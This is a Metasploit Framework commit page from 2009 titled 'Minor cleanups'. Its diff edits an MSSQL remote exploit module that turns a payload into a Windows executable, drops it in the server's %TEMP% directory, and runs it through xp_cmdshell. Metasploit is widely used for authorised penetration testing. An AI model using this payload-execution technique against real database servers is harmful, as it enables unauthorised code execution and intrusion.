1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-12 11:52:01 +01:00

Minor cleanups

git-svn-id: file:///home/svn/framework3/trunk@7163 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2009-10-15 01:44:00 +00:00
parent 59676df4db
commit c4bfae59aa

View File

@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
return
end
print_status("Warning: This exploit will leave #{var_payload}.exe in the System32 directory of the target")
print_status("Warning: This exploit will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
hex = Msf::Util::EXE.to_win32pe(framework,payload.encoded).unpack("H*")[0]
@ -86,12 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote
end
print_status("Converting the encoded payload...")
mssql_xpcmdshell("cmd.exe /c %TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug)
mssql_xpcmdshell("%TEMP%\\#{var_bypass}.exe %TEMP%\\#{var_payload}", debug)
mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_bypass}.exe", debug)
mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
print_status("Executing the payload...")
mssql_xpcmdshell("cmd.exe /c %TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
handler
disconnect